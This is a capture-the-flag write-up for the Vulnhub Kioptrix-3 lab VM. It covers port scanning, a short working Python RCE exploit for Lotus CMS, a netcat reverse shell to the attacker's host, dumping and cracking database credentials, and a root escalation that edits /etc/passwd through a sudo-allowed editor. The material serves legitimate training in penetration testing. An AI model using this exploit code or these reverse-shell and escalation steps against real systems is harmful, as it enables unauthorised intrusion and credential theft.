Nmap
Port 80
Gallery
Lotus CMS
Exploitation
Post exploitation
Privilege escalation: www-data to loneferret
Enumeration
MySQL
Post exploitation
Privilege escalation: loneferret to root
Enumeration
Sudo
Exploitation
Welcome to the Kioptrix-3 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Kioptrix-3
tags: Vulnhub
Easy
Linux
OSCP
Platform: Vulnhub
Difficult: Easy
S.O.: Linux
Link: Click here
Inside the box link, we can find this recomendation:
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Kioptrix: Level 1.2 (#3)
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T4 -p- 172.20.10.8
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 08:52 CEST
Nmap scan report for 172.20.10.8
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,80 172.20.10.8
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 08:53 CEST
Nmap scan report for 172.20.10.8
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 172.20.10.8
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
Port 80
When we entered the website of port 80 we found a small blog in which in its first post New Gallery Online!
They mention a photo gallery in the link http://kioptrix3.com/gallery.
Gallery
Looking the source code of the website, we can find one admin
login link commented.
<!-- <a href="gadmin">Admin</a> -->
Lotus CMS
Looking for vulnerabilities for Lotus CMS we can find an RCE in this link but I have only gotten the test injection to work.
Exploitation
Therefore, based on the repository exploit, we can write 6 very simple lines to get an RCE to play with.
import requests, sys, urllib.parse
s = requests.session()
payload = "');${"+sys.argv[2]+"};#"
template = s.get('http://'+sys.argv[1]+'/index.php?page=index').text
r = s.get('http://'+sys.argv[1]+'/index.php?page=index'+urllib.parse.quote_plus(payload))
print(r.text.replace(template, '').strip())
Let's try it!
$ python3 rce.py 172.20.10.8 "system('id')"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Great! Let's see if we can get a shell...
We are going to put a terminal to listen and try.
$ python3 rce.py 172.20.10.8 "system('nc -e /bin/bash 172.20.10.4 8787')"
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.8] 60573
python -c "import pty; pty.spawn('/bin/bash')"
www-data@Kioptrix3:/home/www/kioptrix3.com$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Post exploitation
Privilege escalation: www-data to loneferret
Enumeration
Inside the file /home/www/kioptrix3.com/gallery/gconfig.php
we can find the MySQL
credentials
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
MySQL
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ mysql -u root -p'fuckeyou'
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| gallery |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------+
| Tables_in_gallery |
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
7 rows in set (0.00 sec)
mysql> select * from gallarific_users;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| 1 | admin | n0t7t1k4 | superuser | Super | User | | 1302628616 | | 1 | | |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)
mysql> select * from dev_accounts;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.00 sec)
Now we have the gallery
credentials, and the dreg
and loneferret
passwords on MD5. Let's see if we can get the real passwords.
Using the website Crackstation we can get the passwords in plain text.
Post exploitation
Privilege escalation: loneferret to root
Enumeration
Sudo
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery/photos$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
The ht
binary is a text editor that thanks to sudo
we can run with root permissions. Knowing this, we can get root in multiple ways.
We are going to inject a user with root permissions in the /etc/passwd
file.
Exploitation
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery/photos$ sudo /usr/local/bin/ht
To open the menu, we need tu press Alt+F
and go to Open
to choose a file.
Now we need to type the choosen file to edit.
Once the file is open, we add at the end the line with our user.
We need to press again Alt+F
and select Save
.
Now we just have to press Alt + F
again and chooseQuit
.
Now we should be able to authenticate with the injected user and we would be root!
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery/photos$ su x4v1l0k
Password:
root@Kioptrix3:/home/www/kioptrix3.com/gallery/photos# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/www/kioptrix3.com/gallery/photos#
And as we can see, this box of the series does have a flag.
root@Kioptrix3:/home/www/kioptrix3.com/gallery/photos# cd /root
root@Kioptrix3:~# ls
Congrats.txt ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
root@Kioptrix3:~#